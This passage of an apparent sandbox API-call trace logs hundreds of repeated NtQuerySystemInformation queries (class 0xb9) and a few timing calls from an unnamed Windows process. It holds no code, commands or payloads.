ResultLength=0x0) [0226.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0226.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0226.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0226.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0226.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x20, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x20, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.652] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd5a0 | out: lpSystemTimeAsFileTime=0xc7520fd5a0*(dwLowDateTime=0xe85f1db9, dwHighDateTime=0x1d5fb6e)) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd590, Length=0x28, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a8, Length=0x50, ResultLength=0x0) [0226.652] GetTickCount () returned 0x11793c7 [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd378, Length=0x58, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0226.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0226.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0226.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0226.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0226.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x28, ResultLength=0x0) [0226.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0226.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x28, ResultLength=0x0) [0226.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x28, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x20, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x20, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd378, Length=0x58, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0226.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0226.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0226.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0226.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0226.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0226.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0226.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0226.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0226.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0226.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd378, Length=0x58, ResultLength=0x0) [0226.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0226.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x28, ResultLength=0x0) [0226.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0226.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0226.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0226.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0226.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0226.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0226.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.688] NtQuerySystemInformation 